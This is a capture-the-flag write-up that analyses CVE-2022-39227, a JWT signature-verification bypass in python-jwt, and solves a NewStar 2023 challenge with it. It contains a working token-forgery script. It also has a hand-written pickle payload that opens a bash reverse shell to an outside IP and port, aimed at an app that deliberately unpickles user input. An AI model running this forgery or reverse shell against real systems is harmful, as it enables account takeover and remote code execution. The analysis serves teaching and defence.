Notes on CVE-2022-39227: the python-jwt vulnerability

Article directory

  • Foreword
  • Affected versions
  • Vulnerability Analysis
  • Newstar2023 Week5
  • Summary

Foreword

Master Asal1n mentioned in passing that NewStar Week 5 had a challenge built on a CVE, much like one from the Xiangyun Cup, so I went to take a look. It was indeed a CVE I had not known about, so I used this challenge to study the authentication bypass vulnerability in the python-jwt library and did a simple code analysis.

Affected versions

python-jwt < 3.3.4

Vulnerability Analysis

The root cause of this vulnerability looks like an oversight by the library author: the payload whose signature is verified and the payload that is returned to the caller are not the same payload. Let's briefly analyze it below.

First, here is a proof of concept adapted from the test that accompanies the author's vulnerability patch in the python-jwt repository on GitHub. We use it for testing, as follows:

from datetime import timedelta
from json import loads, dumps

from jwcrypto import jwk
from jwcrypto.common import base64url_decode, base64url_encode
from python_jwt import generate_jwt, verify_jwt

# Issue a legitimate token whose role is "guest"
payload = {'role': "guest"}
key = jwk.JWK.generate(kty='oct', size=256)
jwt_json = generate_jwt(payload, key, 'HS256', timedelta(minutes=60))
[header, payload, signature] = jwt_json.split('.')
# Forge the claims: change the role to "admin"
parsed_payload = loads(base64url_decode(payload))
parsed_payload['role'] = "admin"
# separators only removes the spaces; leaving it out does not seem to affect the vulnerability
fake = base64url_encode(dumps(parsed_payload, separators=(',', ':')))
# Polyglot token: a valid JSON object that also splits into three parts on '.'
fake_jwt = '{" ' + header + '.' + fake + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature": "' + signature + '"}'
print(fake_jwt)
token = verify_jwt(fake_jwt, key, ['HS256'])
print(token)
  1. Step into verify_jwt. The first part of the function is as follows:
    # Default to an empty list if no allowed algorithms were passed in
    if allowed_algs is None:
        allowed_algs = []
    # Raise an exception if allowed_algs is not a list
    if not isinstance(allowed_algs, list):
        # jwcrypto only supports list of allowed algorithms
        raise _JWTError('allowed_algs must be a list')
    # Split the jwt into three parts on '.'
    header, claims, _ = jwt.split('.')
    # Base64url-decode the header part and parse it as JSON
    parsed_header = json_decode(base64url_decode(header))
    # Read alg from the header (HS256 in the PoC above).
    # Raise an exception if it is missing or not in the allowed list.
    alg = parsed_header.get('alg')
    if alg is None:
        raise _JWTError('alg header not present')
    if alg not in allowed_algs:
        raise _JWTError('algorithm not allowed: ' + alg)
    # ignore_not_implemented defaults to False: walk the header keys and
    # raise an exception for any key that JWS does not know or support.
    if not ignore_not_implemented:
        for k in parsed_header:
            if k not in JWSHeaderRegistry:
                raise _JWTError('unknown header: ' + k)
            if not JWSHeaderRegistry[k].supported:
                raise _JWTError('header not implemented: ' + k)
    # Verify the signature. Note that the jwt passed in here is the whole
    # original string, not the parts produced by split('.') above.
    if pub_key:
        token = JWS()
        token.allowed_algs = allowed_algs
        token.deserialize(jwt, pub_key)

Here base64url_decode() decodes URL-safe Base64.
URL-safe Base64 is standard Base64 with a few modifications so that the output does not conflict with characters that have a special meaning in URLs.
Specifically, the encoder replaces "+" with "-", replaces "/" with "_", and removes the trailing "=". The decoder also ignores characters that are not in the Base64 alphabet, which is why the leading {" in front of the forged token's header does not break header decoding.
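
The lenient decoding described above can be reproduced with the standard library alone. The following is a minimal sketch, assuming a helper (b64url_decode_lenient, a hypothetical name) that restores padding and then calls base64.urlsafe_b64decode; it approximates the library behaviour rather than copying it.

```python
import base64
import json


def b64url_decode_lenient(text: str) -> bytes:
    """Hypothetical helper: restore '=' padding, then decode leniently."""
    remainder = len(text) % 4
    if remainder == 2:
        text += "=="
    elif remainder == 3:
        text += "="
    elif remainder != 0:
        raise ValueError("Invalid base64 string")
    # The stdlib decoder skips characters outside the Base64 alphabet by default
    return base64.urlsafe_b64decode(text.encode("utf-8"))


def b64url_encode(data: bytes) -> str:
    """Encode to URL-safe Base64 and drop the trailing '=' padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


header_json = json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":"))
header_b64 = b64url_encode(header_json.encode("utf-8"))

# Same header, but prefixed with the junk that starts the forged token
polluted = '{" ' + header_b64

clean_bytes = b64url_decode_lenient(header_b64)
polluted_bytes = b64url_decode_lenient(polluted)
print(clean_bytes == polluted_bytes)
```

Both inputs decode to the same header bytes, so a header check that only looks at the decoded JSON cannot tell the two apart.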

  2. Step into deserialize, which parses the token and verifies the signature. The code is as follows:
    def deserialize(self, raw_jws, key=None, alg=None):
        self.objects = {}
        o = {}
        try:
            try:
                # Try to parse the incoming original jwt as JSON
                djws = json_decode(raw_jws)
                # Multiple signatures: deserialize each one and store it in the list
                if 'signatures' in djws:
                    o['signatures'] = []
                    for s in djws['signatures']:
                        os = self._deserialize_signature(s)
                        o['signatures'].append(os)
                        self._deserialize_b64(o, os.get('protected'))
                # Single signature: take the signature, protected and header
                # fields directly from the JSON object and store them in o
                else:
                    o = self._deserialize_signature(djws)
                    # Check the b64 header to see whether the payload is base64url-encoded
                    self._deserialize_b64(o, o.get('protected'))

                # Parse the payload field
                if 'payload' in djws:
                    if o.get('b64', True):
                        o['payload'] = base64url_decode(str(djws['payload']))
                    else:
                        o['payload'] = djws['payload']

            # If JSON parsing fails, treat the input as compact serialization:
            # split on '.' and assign the three parts separately
            except ValueError:
                c = raw_jws.split('.')
                if len(c) != 3:
                    raise InvalidJWSObject('Unrecognized'
                                           ' representation') from None
                p = base64url_decode(str(c[0]))
                if len(p) > 0:
                    o['protected'] = p.decode('utf-8')
                    self._deserialize_b64(o, o['protected'])
                o['payload'] = base64url_decode(str(c[1]))
                o['signature'] = base64url_decode(str(c[2]))

            # Store o in self.objects
            self.objects = o

        except Exception as e:  # pylint: disable=broad-except
            raise InvalidJWSObject('Invalid format') from e

        if key:
            # Pass the key and signature algorithm into verify
            self.verify(key, alg)
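
The branch selection in deserialize (JSON first, compact as a fallback) can be sketched in isolation. This is a simplified illustration using only the standard library; detect_serialization is a hypothetical helper and the token strings are placeholders, not real signed tokens.

```python
import json


def detect_serialization(raw_jws: str) -> str:
    """Hypothetical helper: report which branch a JSON-first parser would take."""
    try:
        json.loads(raw_jws)
        return "json"
    except ValueError:
        # Not JSON: fall back to compact serialization, which needs three parts
        if len(raw_jws.split(".")) != 3:
            raise ValueError("Unrecognized representation") from None
        return "compact"


# Placeholder compact token: header.payload.signature
compact = "aGVhZGVy.cGF5bG9hZA.c2ln"

# Placeholder polyglot: valid JSON that also contains exactly two dots
polyglot = ('{" aGVhZGVy.ZmFrZQ.":"","protected":"aGVhZGVy",'
            '"payload":"cGF5bG9hZA","signature":"c2ln"}')

print(detect_serialization(compact))
print(detect_serialization(polyglot))
```

The forged token is valid JSON, so it never reaches the split('.') fallback inside deserialize, even though verify_jwt itself has already split the same string on '.'.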

  3. The verify() function is as follows:
    def verify(self, key, alg=None, detached_payload=None):
        self.verifylog = []
        # Verification is treated as failed by default
        self.objects['valid'] = False
        obj = self.objects
        missingkey = False
        if 'signature' in obj:
            # Extract the payload stored by deserialize
            payload = self._get_obj_payload(obj, detached_payload)
            # Everything checked here (protected, payload, signature) still comes
            # from the original legitimate jwt, so _verify passes and valid is set to True
            try:
                self._verify(alg, key,
                             payload,
                             obj['signature'],
                             obj.get('protected', None),
                             obj.get('header', None))
                obj['valid'] = True
            except Exception as e:  # pylint: disable=broad-except
                if isinstance(e, JWKeyNotFound):
                    missingkey = True
                self.verifylog.append('Failed: [%s]' % repr(e))
        # Multiple signatures
        elif 'signatures' in obj:
            payload = self._get_obj_payload(obj, detached_payload)
            for o in obj['signatures']:
                try:
                    self._verify(alg, key,
                                 payload,
                                 o['signature'],
                                 o.get('protected', None),
                                 o.get('header', None))
                    # Ok if at least one verifies
                    obj['valid'] = True
                except Exception as e:  # pylint: disable=broad-except
                    if isinstance(e, JWKeyNotFound):
                        missingkey = True
                    self.verifylog.append('Failed: [%s]' % repr(e))
        else:
            raise InvalidJWSSignature('No signatures available')
        # If signature verification failed, raise an exception
        if not self.is_valid:
            if missingkey:
                raise JWKeyNotFound('No working key found in key set')
            raise InvalidJWSSignature('Verification failed for all '
                                      'signatures' + repr(self.verifylog))

What the verification code checks here is actually the original, legitimate JWT (the protected, payload and signature fields of the JSON object). It has nothing to do with the forged payload.

  4. Back in verify_jwt, the code continues:
    # JSON-parse the middle part produced by split('.'), which is the payload we forged
    parsed_claims = json_decode(base64url_decode(claims))
    # Get the current time
    utcnow = datetime.utcnow()
    now = timegm(utcnow.utctimetuple())
    # Read typ from the header; no exception is raised when it is JWT
    typ = parsed_header.get('typ')
    if typ is None:
        if not checks_optional:
            raise _JWTError('typ header not present')
    elif typ != 'JWT':
        raise _JWTError('typ header is not JWT')
    # Read iat (the issue timestamp) from the forged payload and check
    # that the token was not issued in the future
    iat = parsed_claims.get('iat')
    if iat is None:
        if not checks_optional:
            raise _JWTError('iat claim not present')
    elif iat > timegm((utcnow + iat_skew).utctimetuple()):
        raise _JWTError('issued in the future')
    # Read nbf (not before) and check that the token is already valid
    nbf = parsed_claims.get('nbf')
    if nbf is None:
        if not checks_optional:
            raise _JWTError('nbf claim not present')
    elif nbf > now:
        raise _JWTError('not yet valid')
    # Read exp (the expiry time); the token has expired if exp is not later than now
    exp = parsed_claims.get('exp')
    if exp is None:
        if not checks_optional:
            raise _JWTError('exp claim not present')
    elif exp <= now:
        raise _JWTError('expired')
    # Return the header and middle part from split('.'), i.e. our forged payload
    return parsed_header, parsed_claims

As we can see, the signature check runs against the legitimate JWT carried in the JSON fields, but what gets returned is the header and middle part obtained by splitting the incoming string on '.'. The returned payload and the payload whose signature was verified are therefore two different payloads, which leads to the identity bypass.
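
The mismatch can be shown without either library. The sketch below is an illustration under stated assumptions: the helper names are hypothetical, the signature is a placeholder rather than a real one, and the final regex check is only one possible guard, not necessarily how python-jwt 3.3.4 fixes the issue.

```python
import base64
import json
import re


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    # Restore padding; the stdlib decoder skips non-alphabet characters
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
real_claims = b64url_encode(b'{"role":"guest"}')
fake_claims = b64url_encode(b'{"role":"admin"}')
signature = b64url_encode(b"placeholder-not-a-real-signature")

polyglot = (
    '{" ' + header + '.' + fake_claims + '.":"","protected":"' + header
    + '","payload":"' + real_claims + '","signature":"' + signature + '"}'
)

# View 1: the split('.') path, which produces the claims that are returned
_, middle, _ = polyglot.split(".")
returned_claims = json.loads(b64url_decode(middle))

# View 2: the JSON path, which decides which payload has its signature checked
verified_claims = json.loads(b64url_decode(json.loads(polyglot)["payload"]))

print(returned_claims, verified_claims)

# Hypothetical guard: accept only strict compact serialization
COMPACT_JWT = re.compile(r"^[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*$")
print(bool(COMPACT_JWT.match(polyglot)))
```

Rejecting anything that is not strict compact form removes the second interpretation. Another option is to build the returned claims from the payload that was actually verified.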

Newstar2023 Week5

The source code for the question is as follows:

# -*- coding: utf-8 -*-
import base64
import string
import random
from flask import *
import jwcrypto.jwk as jwk
import pickle
from python_jwt import *

app = Flask(__name__)


def generate_random_string(length=16):
    characters = string.ascii_letters + string.digits # Contains letters and numbers
    random_string = ''.join(random.choice(characters) for _ in range(length))
    return random_string


app.config['SECRET_KEY'] = generate_random_string(16)
key = jwk.JWK.generate(kty='RSA', size=2048)


@app.route("/")
def index():
    payload = request.args.get("token")
    if payload:
        token = verify_jwt(payload, key, ['PS256'])
        print(token)
        session["role"] = token[1]['role']
        return render_template('index.html')
    else:
        session["role"] = "guest"
        user = {"username": "boogipop", "role": "guest"}
        jwt = generate_jwt(user, key, 'PS256', timedelta(minutes=60))
        return jwt


@app.route("/pickle")
def unser():
    if session["role"] == "admin":
        pickle.loads(base64.b64decode(request.args.get("pickle")))
        return 'success'
    else:
        return 'fail'


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000, debug=True)

The idea of the challenge is straightforward: forge a JWT so that the role in the returned (forged) payload is admin, then trigger pickle deserialization through the /pickle route.

  1. Take the guest JWT issued by the challenge and forge directly from it to bypass identity verification.

from json import loads, dumps
from jwcrypto.common import base64url_encode, base64url_decode


def forge_admin_token(token):
    # Split the guest JWT issued by the challenge into its three parts
    [header, payload, signature] = token.split('.')
    parsed_payload = loads(base64url_decode(payload))
    print(parsed_payload)
    # Change the role claim to admin
    parsed_payload["role"] = "admin"
    print(dumps(parsed_payload, separators=(',', ':')))
    fake_payload = base64url_encode(dumps(parsed_payload, separators=(',', ':')))
    print(fake_payload)
    # The original header, payload and signature go into the JSON fields,
    # so the signature check still passes
    return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'


print(forge_admin_token('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2OTkzNjkyMzcsImlhdCI6MTY5OTM2NTYzNywianRpIjoiTUV0SEJKX1JZeVR3MmhnUmZMcnFsdyIsIm5iZiI6MTY5OTM2NTYzNywicm9sZSI6Imd1ZXN0IiwidXNlcm5hbWUiOiJib29naXBvcCJ9.nw0s5c4lL0GtUBb7IJTbIhVTE7kzNg7s4l93PrhWZmYKuxWCyZmi7cKWE63Tv3Z6sdUQVp_7IlM8yiY32mNSOwRHCADWllFo18bmlXVri_qdWR-CCVkVi6npIliEBXl_Hbpnh64dCIQuY13-gr0Y412svenGADO-uubqxT3Ml7dlpnaDZ7F06ISkg_m4syc0DQpKKuQv4xFshMYHgaxCCkLpJCMHScIxSjSjoxpD3LnNjYRXgVue8R4TcZ75ZWgaSmkNUmHUrizdTFyi0GVutnaT1Nw4yZKkS5DZxAVUYqcARLUSGvWmt1pZnyny0eR23q7Z8X7Mw-LytE-XfmkAFQ'))


  2. The session returned for this request is the admin's session.

  3. Trigger pickle deserialization and get a reverse shell.
import base64

# Hand-written pickle: MARK, GLOBAL os.system, STRING <command>, OBJ (calls os.system(command))
p = b'''(cos
system
S'bash -c "bash -i >& /dev/tcp/120.79.29.170/5555 0>&1"'
o'''
payload = base64.b64encode(p)
print(payload)
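
To see how a hand-written pickle of this shape turns into a function call, here is a harmless sketch using only the standard library. It swaps os.system for builtins.len (a stand-in chosen for illustration) and adds the STOP opcode so that pickle.loads returns a value.

```python
import pickle
import pickletools

# Same opcode layout as the exploit, but calling builtins.len('abc'):
#   (            MARK
#   cbuiltins    GLOBAL: push the callable builtins.len
#   len
#   S'abc'       STRING: push the argument
#   o            OBJ: pop everything above MARK and call callable(*args)
#   .            STOP: return the top of the stack
demo = b"(cbuiltins\nlen\nS'abc'\no."

# List the opcode names without executing anything
opcode_names = [opcode.name for opcode, arg, pos in pickletools.genops(demo)]
print(opcode_names)

# Unpickling performs the call; only do this with data you trust
result = pickle.loads(demo)
print(result)
```

The call happens as soon as the OBJ opcode is processed, which is why passing attacker-controlled data to pickle.loads is enough for command execution.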

Summary

JWT problems never seem to run out: empty-signature (none algorithm) authentication, the array bypass in Node.js, and so on. Vulnerabilities in this area turn up frequently.